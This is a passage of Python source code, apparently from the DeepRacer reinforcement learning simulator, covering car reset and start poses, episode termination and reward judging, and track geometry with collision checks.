'''Get car reset model state when car goes offtrack or crash into a static obstacle
Args:
car_pose (Pose): current car pose
Returns:
ModelState: reset state
'''
cur_dist = self._data_dict_['current_progress'] * \
self._track_data_.get_track_length() / 100.0
closest_object_dist, closest_obstacle_pose = self._get_closest_obj(cur_dist, const.OBSTACLE_NAME_PREFIX)
if closest_obstacle_pose is not None:
# If static obstacle is in circumference of reset position,
# put the car to opposite lane and 1m back.
cur_dist = closest_object_dist - const.RESET_BEHIND_DIST
cur_center_pose, inner_reset_pose, outer_reset_pose = self._get_reset_poses(dist=cur_dist)
is_object_inner = self._is_obstacle_inner(obstacle_pose=closest_obstacle_pose)
new_pose = outer_reset_pose if is_object_inner else inner_reset_pose
else:
cur_center_pose, inner_reset_pose, outer_reset_pose = self._get_reset_poses(dist=cur_dist)
# If there is no obstacle interfering reset position, then
# put the car back to closest lane from the off-track position.
inner_distance = pose_distance(inner_reset_pose, car_pose)
outer_distance = pose_distance(outer_reset_pose, car_pose)
new_pose = inner_reset_pose if inner_distance < outer_distance else outer_reset_pose
# check for whether reset pose is valid or not
new_pose = self._check_for_invalid_reset_pose(pose=new_pose, dist=cur_dist)
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
car_model_state.pose = new_pose
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
return car_model_state
def _get_car_start_model_state(self):
'''Get car start model state. For training, if start position has an object,
reset to the opposite lane. We assume that during training, there are no objects
at both lane in the same progress. For evaluation, always start at progress 0.
Returns:
ModelState: start state
'''
# start_dist should be hypothetical start line (start_ndist) plus
# start position offset (start_line_ndist_offset).
start_dist = (self._data_dict_['start_ndist'] + self._start_line_ndist_offset) * self._track_data_.get_track_length()
if self._is_training_:
_, closest_object_pose = self._get_closest_obj(start_dist)
# Compute the start pose based on start distance
start_pose = self._track_data_.center_line.interpolate_pose(
start_dist,
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
# If closest_object_pose is not None, for example bot car is around agent
# start position. The below logic checks for whether inner or outer lane
# is available for placement. Then, it updates start_pose accordingly.
if closest_object_pose is not None:
object_point = Point([closest_object_pose.position.x, closest_object_pose.position.y])
object_nearest_pnts_dict = self._track_data_.get_nearest_points(object_point)
object_nearest_dist_dict = self._track_data_.get_nearest_dist(object_nearest_pnts_dict,
object_point)
object_is_inner = object_nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
object_nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]
if object_is_inner:
start_pose = self._track_data_.outer_lane.interpolate_pose(
self._track_data_.outer_lane.project(Point(start_pose.position.x,
start_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
else:
start_pose = self._track_data_.inner_lane.interpolate_pose(
self._track_data_.inner_lane.project(Point(start_pose.position.x,
start_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
else:
start_pose = self._start_lane_.interpolate_pose(
start_dist,
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
# check for whether reset pose is valid or not
start_pose = self._check_for_invalid_reset_pose(pose=start_pose, dist=start_dist)
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
car_model_state.pose = start_pose
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
return car_model_state
def _check_for_invalid_reset_pose(self, pose, dist):
# if current reset position/orientation is inf/-inf or nan, reset to the starting position centerline
pose_list = [pose.position.x, pose.position.y, pose.position.z,
pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w]
if math.inf in pose_list or -math.inf in pose_list or math.nan in pose_list:
logger.info("invalid reset pose {} for distance {}".format(pose_list, dist))
pose, _, _ = self._get_reset_poses(dist=0.0)
# if is training job, update to start_ndist to 0.0
if self._is_training_:
self._data_dict_['start_ndist'] = 0.0
return pose
def send_action(self, action):
'''Publish action topic to gazebo to render
Args:
action (int): model metadata action_space index
Raises:
GenericRolloutException: Agent phase is not defined
'''
if self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.RUN.value:
steering_angle = float(self._json_actions_[action]['steering_angle']) * math.pi / 180.0
speed = float(self._json_actions_[action]['speed'] / const.WHEEL_RADIUS) \
* self._speed_scale_factor_
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, steering_angle, speed)
elif self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PAUSE.value or \
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PARK.value:
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, 0.0, 0.0)
else:
raise GenericRolloutException('Agent phase {} is not defined'.\
format(self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value]))
def _get_agent_pos(self, car_pose, car_link_points, relative_pos):
'''Returns a dictionary with the keys defined in AgentPos which contains
the position of the agent on the track, the location of the desired
links, and the orientation of the agent.
car_pose - Gazebo Pose of the agent
car_link_points (Point[]) - List of car's links' Points.
relative_pos - List containing the x-y relative position of the front of
the agent
'''
try:
# Compute the model's orientation
model_orientation = np.array([car_pose.orientation.x,
car_pose.orientation.y,
car_pose.orientation.z,
car_pose.orientation.w])
# Compute the model's location relative to the front of the agent
model_location = np.array([car_pose.position.x,
car_pose.position.y,
car_pose.position.z]) + \
apply_orientation(model_orientation, np.array(relative_pos))
model_point = Point(model_location[0], model_location[1])
return {AgentPos.ORIENTATION.value: model_orientation,
AgentPos.POINT.value: model_point,
AgentPos.LINK_POINTS.value: car_link_points}
except Exception as ex:
raise GenericRolloutException("Unable to get position: {}".format(ex))
def update_agent(self, action):
'''Update agent reward and metrics ater the action is taken
Args:
action (int): model metadata action_space index
Returns:
dict: dictionary of agent info with agent name as the key and info as the value
Raises:
GenericRolloutException: Cannot find position
'''
# get car state
car_model_state = GetModelStateTracker.get_instance().get_model_state(self._agent_name_, '')
self._track_data_.update_object_pose(self._agent_name_, car_model_state.pose)
link_states = [GetLinkStateTracker.get_instance().get_link_state(link_name, reference_frame).link_state
for link_name, reference_frame in zip(self._agent_link_name_list_, self.reference_frames)]
link_points = [self.make_link_points(link_state) for link_state in link_states]
current_car_pose = car_model_state.pose
try:
# Get the position of the agent
pos_dict = self._get_agent_pos(current_car_pose,
link_points,
const.RELATIVE_POSITION_OF_FRONT_OF_CAR)
model_point = pos_dict[AgentPos.POINT.value]
self._data_dict_['steps'] += 1
except Exception as ex:
raise GenericRolloutException('Cannot find position: {}'.format(ex))
# Set the reward and training metrics
set_reward_and_metrics(self._reward_params_, self._step_metrics_,
self._agent_name_, pos_dict, self._track_data_,
self._data_dict_, action, self._json_actions_,
current_car_pose)
prev_pnt_dist = min(model_point.distance(self._prev_waypoints_['prev_point']),
model_point.distance(self._prev_waypoints_['prev_point_2']))
self._data_dict_['current_progress'] = self._reward_params_[const.RewardParam.PROG.value[0]]
self._data_dict_['max_progress'] = max(self._data_dict_['max_progress'],
self._data_dict_['current_progress'])
self._prev_waypoints_['prev_point_2'] = self._prev_waypoints_['prev_point']
self._prev_waypoints_['prev_point'] = model_point
self._ctrl_status[AgentCtrlStatus.POS_DICT.value] = pos_dict
self._ctrl_status[AgentCtrlStatus.STEPS.value] = self._data_dict_['steps']
self._ctrl_status[AgentCtrlStatus.CURRENT_PROGRESS.value] = self._data_dict_['current_progress']
self._ctrl_status[AgentCtrlStatus.PREV_PROGRESS.value] = self._data_dict_['prev_progress']
self._ctrl_status[AgentCtrlStatus.PREV_PNT_DIST.value] = prev_pnt_dist
self._ctrl_status[AgentCtrlStatus.START_NDIST.value] = self._data_dict_['start_ndist']
return {self._agent_name_: self._reset_rules_manager.update(self._ctrl_status)}
def judge_action(self, agents_info_map):
'''Judge the action that agent just take
Args:
agents_info_map: Dictionary contains all agents info with agent name as the key
and info as the value
Returns:
tuple (float, bool, dict): tuple of reward, done flag, and step metrics
Raises:
RewardFunctionError: Reward function exception
GenericRolloutException: reward is nan or inf
'''
# check agent status to update reward and done flag
reset_rules_status = self._reset_rules_manager.get_dones()
self._reward_params_[const.RewardParam.CRASHED.value[0]] = \
reset_rules_status[EpisodeStatus.CRASHED.value]
self._reward_params_[const.RewardParam.OFFTRACK.value[0]] = \
reset_rules_status[EpisodeStatus.OFF_TRACK.value]
episode_status, pause, done = self._check_for_episode_termination(reset_rules_status, agents_info_map)
if not pause and not done:
# If episode termination check returns status as not paused and not done, and
# if reset_rules_status's CRASHED is true, then the crashed object must have smaller normalize progress
# compare to rollout agent.
# - if reset_rules_status's CRASHED is false, then reward params' CRASHED should be already false.
# In such case, from rollout_agent's perspective, it should consider it as there is no crash.
# Therefore, setting reward params' CRASHED as false if not paused and not done.
self._reward_params_[const.RewardParam.CRASHED.value[0]] = False
if self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.RUN.value:
reward = self._judge_action_at_run_phase(episode_status=episode_status, pause=pause)
elif self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PAUSE.value:
reward, episode_status = self._judge_action_at_pause_phase(episode_status=episode_status, done=done)
elif self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PARK.value:
self._park_car_model()
episode_status, pause, done = EpisodeStatus.PARK.value, False, True
reward = const.ZERO_REWARD
else:
raise GenericRolloutException('Agent phase {} is not defined'.\
format(self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value]))
# update and upload metrics
self._step_metrics_[StepMetrics.REWARD.value] = reward
self._step_metrics_[StepMetrics.DONE.value] = done
self._step_metrics_[StepMetrics.TIME.value] = time.time()
self._step_metrics_[StepMetrics.EPISODE_STATUS.value] = episode_status
self._data_dict_['prev_progress'] = 0.0 if self._step_metrics_[StepMetrics.PROG.value] == 100 \
else self._step_metrics_[StepMetrics.PROG.value]
if self._data_dict_['current_progress'] == 100:
self._data_dict_['max_progress'] = 0.0
self._data_dict_['current_progress'] = 0.0
self._metrics.upload_step_metrics(self._step_metrics_)
if self._is_continuous and self._reward_params_[const.RewardParam.PROG.value[0]] == 100:
self._metrics.append_episode_metrics()
self._metrics.reset()
self._reset_rules_manager.reset()
return reward, done, self._step_metrics_
def _judge_action_at_run_phase(self, episode_status, pause):
self._pause_duration = 0.0
current_car_pose = self._track_data_.get_object_pose(self._agent_name_)
try:
reward = float(self._reward_(copy.deepcopy(self._reward_params_)))
except Exception as ex:
raise RewardFunctionError('Reward function exception {}'.format(ex))
if math.isnan(reward) or math.isinf(reward):
raise RewardFunctionError('{} returned as reward'.format(reward))
# transition to AgentPhase.PARK.value when episode complete and done condition is all
if episode_status == EpisodeStatus.EPISODE_COMPLETE.value and \
self._done_condition == all:
self._park_position = self._track_data_.pop_park_position()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.PARK.value
self._park_car_model()
# transition to AgentPhase.PAUSE.value
if pause:
should_reset_camera = False
pause_car_model_pose = current_car_pose
# add pause time based on different paused status
if episode_status == EpisodeStatus.CRASHED.value:
self._pause_duration += self._collision_penalty
# add blink effect and remove current agent from collision list
if self._collision_penalty > 0.0:
effect = BlinkEffect(model_name=self._agent_name_,
min_alpha=const.BLINK_MIN_ALPHA,
interval=const.BLINK_INTERVAL,
duration=self._collision_penalty)
effect.attach()
# If crash into an static obstacle, reset first and then pause. This will prevent
# agent and obstacle wiggling around because bit mask is not used between agent
# and static obstacle
if 'obstacle' in self._curr_crashed_object_name:
pause_car_model_pose = self._get_car_reset_model_state(
car_pose=current_car_pose).pose
should_reset_camera = True
elif episode_status == EpisodeStatus.OFF_TRACK.value:
self._pause_duration += self._off_track_penalty
# add blink effect and remove current agent from collision list
if self._off_track_penalty > 0.0:
effect = BlinkEffect(model_name=self._agent_name_,
min_alpha=const.BLINK_MIN_ALPHA,
interval=const.BLINK_INTERVAL,
duration=self._off_track_penalty)
effect.attach()
# when agent off track current car pose might be closer
# to other part of the track. Therefore, instead of using
# current car pose to calculate reset position, the previous
# car pose is used.
pause_car_model_pose = self._get_car_reset_model_state(
car_pose=self._data_dict_['prev_car_pose']).pose
should_reset_camera = True
self._pause_car_model_pose = pause_car_model_pose
self._pause_car_model(should_reset_camera=should_reset_camera)
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.PAUSE.value
self._data_dict_['prev_car_pose'] = current_car_pose
return reward
def _judge_action_at_pause_phase(self, episode_status, done):
reward = const.ZERO_REWARD
self._pause_car_model()
# transition to AgentPhase.RUN.value
if self._pause_duration <= 0.0:
# if reset during pause, do not reset again after penalty seconds is over
self._reset_rules_manager.reset()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.RUN.value
if not done:
episode_status = EpisodeStatus.PAUSE.value
return reward, episode_status
def _check_for_episode_termination(self, reset_rules_status, agents_info_map):
'''Check for whether a episode should be terminated
Args:
reset_rules_status: dictionary of reset rules status with key as reset rule names and value as
reset rule bool status
agents_info_map: dictionary of agents info map with key as agent name and value as agent info
Returns:
tuple (string, bool, bool): episode status, pause flag, and done flag
'''
episode_status = EpisodeStatus.get_episode_status(reset_rules_status)
pause = False
done = False
# Note: check EPISODE_COMPLETE as the first item because agent might crash
# at the finish line.
if EpisodeStatus.EPISODE_COMPLETE.value in reset_rules_status and \
reset_rules_status[EpisodeStatus.EPISODE_COMPLETE.value]:
done = True
episode_status = EpisodeStatus.EPISODE_COMPLETE.value
elif EpisodeStatus.CRASHED.value in reset_rules_status and \
reset_rules_status[EpisodeStatus.CRASHED.value]:
# only check for crash when at RUN phase
if self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.RUN.value:
self._curr_crashed_object_name = agents_info_map[self._agent_name_][AgentInfo.CRASHED_OBJECT_NAME.value]
# check crash with all other objects besides static obstacle
if 'obstacle' not in self._curr_crashed_object_name:
current_progress = agents_info_map[self._agent_name_][AgentInfo.CURRENT_PROGRESS.value]
crashed_obj_info = agents_info_map[self._curr_crashed_object_name]
crashed_obj_progress = crashed_obj_info[AgentInfo.CURRENT_PROGRESS.value]
crashed_obj_start_ndist = crashed_obj_info[AgentInfo.START_NDIST.value]
crashed_object_progress = get_normalized_progress(crashed_obj_progress,
start_ndist=crashed_obj_start_ndist)
current_progress = get_normalized_progress(current_progress,
start_ndist=self._data_dict_['start_ndist'])
if current_progress < crashed_object_progress:
done, pause = self._check_for_phase_change()
else:
episode_status = EpisodeStatus.IN_PROGRESS.value
else:
done, pause = self._check_for_phase_change()
else:
pause = True
elif any(reset_rules_status.values()):
done, pause = self._check_for_phase_change()
return episode_status, pause, done
def _check_for_phase_change(self):
'''check whether to pause a agent
Returns:
tuple(bool, bool): done flag and pause flag
'''
done, pause = True, False
if self._reset_count < self._number_of_resets:
self._reset_count += 1
self._reset_rules_manager.reset()
done, pause = False, True
return done, pause
def finish_episode(self):
'''finish episode by appending episode metrics, upload metrics, and alternate direction
if needed
'''
if not self._is_continuous:
self._metrics.append_episode_metrics()
self._metrics.upload_episode_metrics()
if self._start_pos_behavior_['change_start'] and self._is_training_:
self._data_dict_['start_ndist'] = (self._data_dict_['start_ndist']
+ self._start_pos_behavior_['round_robin_advance_dist']) % 1.0
# For multi-agent case, alternating direction will NOT work!
# Reverse direction will be set multiple times
# However, we are not supporting multi-agent training for now
if self._start_pos_behavior_['alternate_dir'] and self._is_training_:
self._track_data_.reverse_dir = not self._track_data_.reverse_dir
def _clear_data(self):
'''clear data at the beginning of a new episode
'''
self._curr_crashed_object_name = ''
self._reset_count = 0
self._reset_rules_manager.reset()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.RUN.value
for key in self._prev_waypoints_:
self._prev_waypoints_[key] = Point(0, 0)
for key in self._data_dict_:
if key != 'start_ndist':
self._data_dict_[key] = 0.0
def update(self, data):
self._is_training_ = data == RunPhase.TRAIN
```
#### File: markov/track_geom/track_data.py
```python
from collections import OrderedDict, deque
from enum import Enum, unique
import math
import os
import threading
import numpy as np
import rospkg
import rospy
from geometry_msgs.msg import Pose
from shapely.geometry import Point, Polygon
from shapely.geometry.polygon import LinearRing, LineString
from markov.agent_ctrl.constants import RewardParam
from markov.cameras.frustum_manager import FrustumManager
from markov.track_geom.constants import TrackNearPnts, TrackNearDist
from markov.track_geom.utils import euler_to_quaternion, apply_orientation, find_prev_next, quaternion_to_euler
from markov.log_handler.deepracer_exceptions import GenericRolloutException
from markov import utils
@unique
class FiniteDifference(Enum):
CENTRAL_DIFFERENCE = 1
FORWARD_DIFFERENCE = 2
class TrackLine(object):
def __init__(self, line):
self.line = line
self.ndists = [self.line.project(Point(p), normalized=True)
for p in self.line.coords[:-1]] + [1.0]
def __getattr__(self, name):
return getattr(self.line, name)
def find_prev_next_waypoints(self, distance, normalized=False):
ndist = distance if normalized else distance / self.line.length
return find_prev_next(self.ndists, ndist)
def interpolate_yaw(self, distance, normalized=False, position=None,
finite_difference=FiniteDifference.CENTRAL_DIFFERENCE):
prev_index, next_index = self.find_prev_next_waypoints(distance, normalized)
if finite_difference == FiniteDifference.CENTRAL_DIFFERENCE:
yaw = math.atan2(self.line.coords[next_index][1] - self.line.coords[prev_index][1],
self.line.coords[next_index][0] - self.line.coords[prev_index][0])
elif finite_difference == FiniteDifference.FORWARD_DIFFERENCE:
if not position: position = self.interpolate(distance, normalized)
yaw = math.atan2(self.line.coords[next_index][1] - position.y,
self.line.coords[next_index][0] - position.x)
else:
raise ValueError("Unrecognized FiniteDifference enum value")
return yaw
def interpolate_pose(self, distance, normalized=False,
finite_difference=FiniteDifference.CENTRAL_DIFFERENCE):
pose = Pose()
position = self.interpolate(distance, normalized)
yaw = self.interpolate_yaw(distance, normalized, position, finite_difference)
orientation = euler_to_quaternion(yaw=yaw)
pose.position.x = position.x
pose.position.y = position.y
pose.position.z = 0.0
pose.orientation.x = orientation[0]
pose.orientation.y = orientation[1]
pose.orientation.z = orientation[2]
pose.orientation.w = orientation[3]
return pose
class TrackData(object):
'''This class is responsible for managing all the track geometry, the object should
be created and shared between agents on the track
'''
# The track data will be a singelton to prevent copying across multiple agents
_instance_ = None
@staticmethod
def get_instance():
'''Method for geting a reference to the track data object'''
if TrackData._instance_ is None:
TrackData()
return TrackData._instance_
@property
def center_line(self):
'''center line property depending on direction
'''
if self._reverse_dir_:
return self._center_line_reverse_
return self._center_line_forward_
@property
def inner_border(self):
'''inner board property depending on direction
'''
if self._reverse_dir_:
return self._inner_border_reverse_
return self._inner_border_forward_
@property
def outer_border(self):
'''outer board property depending on direction
'''
if self._reverse_dir_:
return self._outer_border_reverse_
return self._outer_border_forward_
@property
def inner_lane(self):
'''inner lane property depending on direction
'''
if self._reverse_dir_:
return self._inner_lane_reverse_
return self._inner_lane_forward_
@property
def outer_lane(self):
'''outer lane property depending on direction
'''
if self._reverse_dir_:
return self._outer_lane_reverse_
return self._outer_lane_forward_
@property
def reverse_dir(self):
'''reverse direction getter
'''
return self._reverse_dir_
@property
def is_ccw(self):
'''ccw direction getter
'''
return self._is_ccw_ ^ self._reverse_dir_
@reverse_dir.setter
def reverse_dir(self, val):
'''reverse direction setter
'''
self._reverse_dir_ = val
@property
def park_positions(self):
'''park positions getter
'''
return self._park_positions_
@park_positions.setter
def park_positions(self, val):
'''park positions setter
'''
self._park_positions_ = deque(val)
def pop_park_position(self):
'''pop first available park position
'''
return self._park_positions_.popleft()
def __init__(self):
'''Instantiates the class and creates clients for the relevant ROS services'''
self._park_positions_ = deque()
self._reverse_dir_ = utils.str2bool(rospy.get_param("REVERSE_DIR", False))
if TrackData._instance_ is not None:
raise GenericRolloutException("Attempting to construct multiple TrackData objects")
try:
rospack = rospkg.RosPack()
deepracer_path = rospack.get_path("deepracer_simulation_environment")
waypoints_path = os.path.join(deepracer_path, "routes",
"{}.npy".format(rospy.get_param("WORLD_NAME")))
self._is_bot_car_ = int(rospy.get_param("NUMBER_OF_BOT_CARS", 0)) > 0
self._bot_car_speed_ = float(rospy.get_param("BOT_CAR_SPEED", 0.0))
waypoints = np.load(waypoints_path)
self.is_loop = np.all(waypoints[0, :] == waypoints[-1, :])
poly_func = LinearRing if self.is_loop else LineString
# forward direction
self._center_line_forward_ = TrackLine(poly_func(waypoints[:, 0:2]))
self._inner_border_forward_ = TrackLine(poly_func(waypoints[:, 2:4]))
self._outer_border_forward_ = TrackLine(poly_func(waypoints[:, 4:6]))
self._inner_lane_forward_ = TrackLine(poly_func((waypoints[:, 2:4] + \
waypoints[:, 0:2])/2))
self._outer_lane_forward_ = TrackLine(poly_func((waypoints[:, 4:6] + \
waypoints[:, 0:2])/2))
# reversed direction
self._center_line_reverse_ = TrackLine(poly_func(waypoints[:, 0:2][::-1]))
self._inner_border_reverse_ = TrackLine(poly_func(waypoints[:, 2:4][::-1]))
self._outer_border_reverse_ = TrackLine(poly_func(waypoints[:, 4:6][::-1]))
self._inner_lane_reverse_ = TrackLine(poly_func((waypoints[:, 2:4][::-1] + \
waypoints[:, 0:2][::-1]) / 2))
self._outer_lane_reverse_ = TrackLine(poly_func((waypoints[:, 4:6][::-1] + \
waypoints[:, 0:2][::-1]) / 2))
if self.is_loop:
self._inner_poly_ = Polygon(self.center_line, [self.inner_border])
self._road_poly_ = Polygon(self.outer_border, [self.inner_border])
self._is_ccw_ = self._center_line_forward_.is_ccw
else:
self._inner_poly_ = Polygon(np.vstack((self.center_line.line,
np.flipud(self.inner_border))))
self._road_poly_ = Polygon(np.vstack((self.outer_border,
np.flipud(self.inner_border))))
self._is_ccw_ = True
self.object_poses = OrderedDict()
self.object_dims = OrderedDict()
self.noncollidable_objects = set()
self.noncollidable_object_lock = threading.Lock()
# There should only be one track data object
TrackData._instance_ = self
# declare a lock to prevent read and write at the same time
self._lock_ = threading.Lock()
except Exception as ex:
raise GenericRolloutException('Failed to create track data: {}'.format(ex))
def initialize_object(self, name, initial_pose, object_dimensions):
self.object_poses[name] = initial_pose
self.object_dims[name] = object_dimensions
def update_object_pose(self, name, object_pose):
if name in self.object_poses:
self.object_poses[name] = object_pose
else:
raise GenericRolloutException('Failed to update object (unrecognized): {}'.format(name))
def get_object_pose(self, name):
return self.object_poses[name]
def find_prev_next_waypoints(self, distance, normalized=False):
return self.center_line.find_prev_next_waypoints(distance, normalized)
@staticmethod
def get_nearest_dist(near_pnt_dict, model_point):
'''Auxiliary method for computing the distance to the nearest points given in
near_pnt_dict.
near_pnt_dict - Dictionary containing the keys specified in TrackNearPnts
model_point - Object returned by calling the model state service which contains
the position data for the agent
'''
try:
dist_from_cent = near_pnt_dict[TrackNearPnts.NEAR_PNT_CENT.value].distance(model_point)
dist_from_in = near_pnt_dict[TrackNearPnts.NEAR_PNT_IN.value].distance(model_point)
dist_from_out = near_pnt_dict[TrackNearPnts.NEAR_PNT_OUT.value].distance(model_point)
return {TrackNearDist.NEAR_DIST_CENT.value : dist_from_cent,
TrackNearDist.NEAR_DIST_IN.value : dist_from_in,
TrackNearDist.NEAR_DIST_OUT.value : dist_from_out}
except Exception as ex:
raise GenericRolloutException("Unable to compute nearest distance: {}".format(ex))
def get_track_length(self):
'''Returns the length of the track'''
try:
return self.center_line.length
except Exception as ex:
raise GenericRolloutException("Unable to get track lenght: {}".format(ex))
def get_way_pnts(self):
'''Returns a list containing all the way points'''
try:
return list(self.center_line.coords)
except Exception as ex:
raise GenericRolloutException("Unable to get way points: {}".format(ex))
def get_norm_dist(self, model_point):
'''Returns the normalized position of the agent relative to the track
model_point - Object returned by calling the model state service which contains
the position data for the agent
'''
try:
return self.center_line.project(model_point, normalized=True)
except Exception as ex:
raise GenericRolloutException("Unable to get norm dist: {}".format(ex))
def get_nearest_points(self, model_point):
'''Returns a dictionary with the keys specified in TrackNearPnts containing
the nearest way points to the agent.
model_point - Object returned by calling the model state service which contains
the position data for the agent
'''
try:
near_pnt_ctr = \
self.center_line.interpolate(self.get_norm_dist(model_point), normalized=True)
near_pnt_in = \
self.inner_border.interpolate(self.inner_border.project(near_pnt_ctr))
near_pnt_out = \
self.outer_border.interpolate(self.outer_border.project(near_pnt_ctr))
return {TrackNearPnts.NEAR_PNT_CENT.value : near_pnt_ctr,
TrackNearPnts.NEAR_PNT_IN.value : near_pnt_in,
TrackNearPnts.NEAR_PNT_OUT.value : near_pnt_out}
except Exception as ex:
raise GenericRolloutException("Unable to get nearest points: {}".format(ex))
def get_object_reward_params(self, racecar_name, model_point, car_pose):
'''Returns a dictionary with object-related reward function params.'''
with self._lock_:
try:
object_locations = [[pose.position.x, pose.position.y]
for name, pose in self.object_poses.items() if racecar_name not in name]
object_poses = [pose for name, pose in self.object_poses.items() if racecar_name not in name]
if not object_locations:
return {}
# Sort the object locations based on projected distance
num_objects = len(object_locations)
object_pdists = [self.center_line.project(Point(p)) for p in object_locations]
object_headings = [0.0] * num_objects
object_speeds = [0.0] * num_objects
if self._is_bot_car_:
for i, object_pose in enumerate(object_poses):
_, _, yaw = quaternion_to_euler(x=object_pose.orientation.x,
y=object_pose.orientation.y,
z=object_pose.orientation.z,
w=object_pose.orientation.w)
object_headings[i] = yaw
object_speeds[i] = self._bot_car_speed_
# Find the prev/next objects
model_pdist = self.center_line.project(model_point)
object_order = np.argsort(object_pdists)
object_pdists_ordered = [object_pdists[i] for i in object_order]
prev_object_index, next_object_index = find_prev_next(object_pdists_ordered, model_pdist)
prev_object_index = object_order[prev_object_index]
next_object_index = object_order[next_object_index]
# Figure out which one is the closest
object_points = [Point([object_location[0], object_location[1]])
for object_location in object_locations]
prev_object_point = object_points[prev_object_index]
next_object_point = object_points[next_object_index]
prev_object_dist = model_point.distance(prev_object_point)
next_object_dist = model_point.distance(next_object_point)
if prev_object_dist < next_object_dist:
closest_object_point = prev_object_point
else:
closest_object_point = next_object_point
# Figure out whether objects is left of center based on direction
objects_left_of_center = [self._inner_poly_.contains(p) ^ (not self.is_ccw) \
for p in object_points]
# Get object distances to centerline
objects_distance_to_center = [self.center_line.distance(p)
for p in object_points]
# Figure out if the next object is in the camera view
objects_in_camera = self.get_objects_in_camera_frustums(agent_name=racecar_name,
car_pose=car_pose)
is_next_object_in_camera = any(object_in_camera_idx == next_object_index
for object_in_camera_idx, _ in objects_in_camera)
# Determine if they are in the same lane
return {RewardParam.CLOSEST_OBJECTS.value[0]: [prev_object_index, next_object_index],
RewardParam.OBJECT_LOCATIONS.value[0]: object_locations,
RewardParam.OBJECTS_LEFT_OF_CENTER.value[0]: objects_left_of_center,
RewardParam.OBJECT_SPEEDS.value[0]: object_speeds,
RewardParam.OBJECT_HEADINGS.value[0]: object_headings,
RewardParam.OBJECT_CENTER_DISTS.value[0]: objects_distance_to_center,
RewardParam.OBJECT_CENTERLINE_PROJECTION_DISTANCES.value[0]: object_pdists,
RewardParam.OBJECT_IN_CAMERA.value[0]: is_next_object_in_camera
}
except Exception as ex:
raise GenericRolloutException("Unable to get object reward params: {}".format(ex))
def get_distance_from_next_and_prev(self, model_point, prev_index, next_index):
'''Returns a tuple, where the first value is the distance to the given previous points
and the second value is the distance to given next point.
model_point - Object returned by calling the model state service which contains
the position data for the agent
prev_index - Integer representing the index of the previous point
next_index - Integer representing the index of the next point
'''
try:
dist_from_prev = model_point.distance(Point(self.center_line.coords[prev_index]))
dist_from_next = model_point.distance(Point(self.center_line.coords[next_index]))
return dist_from_prev, dist_from_next
except Exception as ex:
raise GenericRolloutException("Unable to get distance to prev and next points: {}".format(ex))
def points_on_track(self, points):
'''Returns a boolean list, where entries of true represent a point in the points list
being on the track, and values of false represent a point in the points list being
of the track.
points - List of points who will be checked for being on or off the track
'''
try:
return [self._road_poly_.contains(pnt) for pnt in points]
except Exception as ex:
raise GenericRolloutException("Unable to get points on track {}".format(ex))
@staticmethod
def get_object_bounding_rect(object_pose, object_dims):
"""
Returns a list of points (numpy.ndarray) of bounding rectangle on the floor.
object_pose - Object pose object.
object_dims - Tuple representing the dimension of object (width, height)
"""
half_width = 0.5 * (object_dims.value[0])
half_length = 0.5 * (object_dims.value[1])
local_verts = np.array([[+half_length, +half_width, 0.0],
[+half_length, -half_width, 0.0],
[-half_length, -half_width, 0.0],
[-half_length, +half_width, 0.0]])
object_position = np.array([object_pose.position.x,
object_pose.position.y,
object_pose.position.z])
object_orientation = np.array([object_pose.orientation.x,
object_pose.orientation.y,
object_pose.orientation.z,
object_pose.orientation.w])
return [object_position
+ apply_orientation(object_orientation, p)
for p in local_verts]
def add_noncollidable_object(self, object_name):
"""
Add object_name as non-collidable object
Args:
object_name (str): the object name to add to non-collidable object list
"""
with self.noncollidable_object_lock:
self.noncollidable_objects.add(object_name)
def remove_noncollidable_object(self, object_name):
"""
Remove object_name from non-collidable object name list
Args:
object_name (str): the object_name to remove from non-collidable list
"""
with self.noncollidable_object_lock:
self.noncollidable_objects.discard(object_name)
def is_object_collidable(self, object_name):
"""
Check whether object with given object_name is collidable or not
Args:
object_name: name of object to check
Returns: True if collidable otherwise false
"""
with self.noncollidable_object_lock:
return object_name not in self.noncollidable_objects
def get_collided_object_name(self, racecar_wheel_points, racecar_name):
'''Get object name that racecar collide into
Args:
racecar_wheel_points (list): List of points that specifies
the wheels of the training car
racecar_name (string): racecar name
Returns:
string: Crashed object name if there is a crashed object. Otherwise ''
Raises:
GenericRolloutException: Unable to detect collision
'''
try:
with self.noncollidable_object_lock:
noncollidable_objects = self.noncollidable_objects.copy()
for object_name in self.object_poses.keys():
if object_name != racecar_name and object_name not in noncollidable_objects:
object_pose = self.object_poses[object_name]
object_dims = self.object_dims[object_name]
object_boundary = Polygon(TrackData.get_object_bounding_rect(object_pose, object_dims))
if any([object_boundary.contains(p) for p in racecar_wheel_points]):
